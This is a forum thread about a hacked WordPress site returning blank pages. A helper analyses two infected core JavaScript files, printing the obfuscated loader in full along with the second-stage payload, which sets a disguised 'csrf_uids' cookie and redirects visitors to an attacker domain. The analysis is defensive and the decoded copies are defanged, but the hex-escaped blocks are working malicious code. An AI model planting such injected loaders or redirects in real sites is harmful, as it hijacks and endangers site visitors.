All my pages turned white! HELP!


whenplay


kenny9

When clicking the link to your site, I receive a virus alert from Avast. There is a good chance your site is infected and is being blocked by x10's virus software.
 

caftpx10

Your site has been compromised. The blank pages are returning HTTP 500. That would mean a fatal PHP error has occurred. In other words, your WordPress installation has been damaged in some way.

So far, two JavaScript files have been found serving obfuscated JavaScript:
Code:
http://whencaniwatch.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
http://whencaniwatch.com/wp-includes/js/wp-emoji-release.min.js?ver=4.7.10
According to Google, both files have in the past been caught serving malicious code, especially 'wp-emoji-release.min.js'.

(The rest of this post is the analysis of the code, for anyone interested. Also Cloudflare keeps bringing up a ReCaptcha when saving a draft because of the content.)

Both serve the following:
Code:
// First-stage loader: a hex-escaped string table (index 4 is the reversed payload, index 5 is "write").
// document.write(reverse(table[4])) injects an external <script> tag; decoded step by step below.
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));
When we further undo this...
Code:
// Same loader with the string table inlined; the IP in the reversed string is defanged with [.] so this listing cannot run as-is.
document['write']('>tpircs/<>"sj.yreuqj/87[.]611[.]942[.]431//:ptth"=crs tpircs<' ['split']('')['reverse']()['join'](''));
So far, we can tell that there is a reversed string and that document.write will be used to write it out onto the page once the string has been reversed again.
Once we reverse the string...
Code:
<script src="http://134[.]249[.]116[.]78/jquery.js"></script>
So, cool. We've got it. There's more to it, however.
When we check out the URL, the file begins with this comment.
Code:
/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */
But then there are a ton of line breaks following that, just so that we think that is all there is to it. If we scroll all the way down, this is shown...
Code:
// Second-stage payload, appended after the copied jQuery license header and a long run of blank lines.
// Same string-table obfuscation as the loader: a cookie setter, a cookie getter, and a gated redirect
// (readable form below). The hex table decodes to the cookie name and the redirect URL, which are the
// indicators worth searching for.
var _0x481b=["\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x63\x73\x72\x66\x5F\x75\x69\x64\x73","\x31","\x2F","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x69\x62\x69\x64\x73\x31\x30\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x6B\x65\x79\x3D\x37\x38\x39\x61\x34\x31\x32\x39\x65\x37\x38\x63\x30\x30\x30\x30\x38\x61\x34\x37\x62\x33\x36\x65\x32\x33\x64\x36\x35\x65\x61\x37"];function _mmm_(_0x6d1dx2,_0x6d1dx3,_0x6d1dx4,_0x6d1dx5){var _0x6d1dx6= new Date();var _0x6d1dx7= new Date();if(_0x6d1dx4=== null|| _0x6d1dx4=== 0){_0x6d1dx4= 3};_0x6d1dx7[_0x481b[1]](_0x6d1dx6[_0x481b[0]]()+ 3600000* 24* _0x6d1dx4);document[_0x481b[2]]= _0x6d1dx2+ _0x481b[3]+ escape(_0x6d1dx3)+ _0x481b[4]+ _0x6d1dx7[_0x481b[5]]()+ ((_0x6d1dx5)?_0x481b[6]+ _0x6d1dx5:_0x481b[7])}function _nnn_(_0x6d1dx9){var _0x6d1dxa=document[_0x481b[2]][_0x481b[8]](_0x6d1dx9+ _0x481b[3]);var _0x6d1dxb=_0x6d1dxa+ _0x6d1dx9[_0x481b[9]]+ 1;if((!_0x6d1dxa) && (_0x6d1dx9!= document[_0x481b[2]][_0x481b[10]](0,_0x6d1dx9[_0x481b[9]]))){return null};if(_0x6d1dxa==  -1){return null};var _0x6d1dxc=document[_0x481b[2]][_0x481b[8]](_0x481b[11],_0x6d1dxb);if(_0x6d1dxc==  -1){_0x6d1dxc= document[_0x481b[2]][_0x481b[9]]};return unescape(document[_0x481b[2]][_0x481b[10]](_0x6d1dxb,_0x6d1dxc))}if(navigator[_0x481b[12]]){if(_nnn_(_0x481b[13])== 1){}else {_mmm_(_0x481b[13],_0x481b[14],_0x481b[14],_0x481b[15]);window[_0x481b[17]][_0x481b[16]]= _0x481b[18]}}
More obfuscated JavaScript code. Great. That looks like a mess, so let's make it more readable...
Code:
// Cookie setter: writes "name=escape(value); expires=<now + days>" to document.cookie,
// with an optional "; path=" suffix. Days defaults to 3 when null or 0. On its own this is
// an ordinary hand-rolled cookie helper; in this payload it only marks a visitor so the
// redirect at the bottom of the script fires once per cookie lifetime.
function _mmm_(_0x6d1dx2, _0x6d1dx3, _0x6d1dx4, _0x6d1dx5) {
    // _0x6d1dx2 = cookie name, _0x6d1dx3 = value, _0x6d1dx4 = lifetime in days, _0x6d1dx5 = path
    var _0x6d1dx6 = new Date();
    var _0x6d1dx7 = new Date();
    if (_0x6d1dx4 === null || _0x6d1dx4 === 0) {
        _0x6d1dx4 = 3
    };
    // 3600000 ms * 24 = one day. The caller passes the string '1', which is coerced by the multiplication.
    _0x6d1dx7['setTime'](_0x6d1dx6['getTime']() + 3600000 * 24 * _0x6d1dx4);
    // Path is appended only when supplied; otherwise the browser applies its default path.
    document['cookie'] = _0x6d1dx2 + '=' + escape(_0x6d1dx3) + ';expires=' + _0x6d1dx7['toGMTString']() + ((_0x6d1dx5) ? '; path=' + _0x6d1dx5 : '')
}

// Cookie getter: returns the unescaped value of the cookie named _0x6d1dx9, or null when
// document.cookie does not contain "name=". Nothing malicious on its own; it is the
// "have we already redirected this visitor?" check for the code at the bottom of the script.
function _nnn_(_0x6d1dx9) {
    var _0x6d1dxa = document['cookie']['indexOf'](_0x6d1dx9 + '=');
    // Index just past "name=", where the value starts.
    var _0x6d1dxb = _0x6d1dxa + _0x6d1dx9['length'] + 1;
    // indexOf() of 0 is falsy, so a cookie at the very start of the string is confirmed by prefix instead.
    if ((!_0x6d1dxa) && (_0x6d1dx9 != document['cookie']['substring'](0, _0x6d1dx9['length']))) {
        return null
    };
    if (_0x6d1dxa == -1) {
        return null
    };
    // The value runs to the next ';' or, for the last cookie, to the end of the string.
    var _0x6d1dxc = document['cookie']['indexOf'](';', _0x6d1dxb);
    if (_0x6d1dxc == -1) {
        _0x6d1dxc = document['cookie']['length']
    };
    return unescape(document['cookie']['substring'](_0x6d1dxb, _0x6d1dxc))
}
// Entry point of the payload. Runs only when cookies are enabled, and only for visitors
// not yet carrying the marker cookie, so each browser is redirected once per day rather
// than on every page load (which makes the infection harder for the site owner to notice).
// The cookie name 'csrf_uids' presumably was chosen to look like a legitimate anti-CSRF
// token. Indicators to search for in logs and browser storage: that cookie name and the
// hibids10 URL/key below.
if (navigator['cookieEnabled']) {
    // Marker already set: do nothing.
    if (_nnn_('csrf_uids') == 1) {} else {
        // Set the marker for 1 day on path '/', then send the browser to the attacker-controlled domain.
        _mmm_('csrf_uids', '1', '1', '/');
        window['location']['href'] = 'http://www[.]hibids10[.]com/watch?key=789a4129e78c00008a47b36e23d65ea7'
    }
}
The code above checks for a cookie, sets a new one if it is missing, and then redirects to this 'hibids10' domain. From there, there are additional redirects.
Search for "789a4129e78c00008a47b36e23d65ea7" on Google. This is not a new thing. Other WordPress installations have been compromised, either because the version of WordPress used is itself vulnerable or because a plugin is vulnerable. Previously a domain beginning with 'cpm20' was used.
 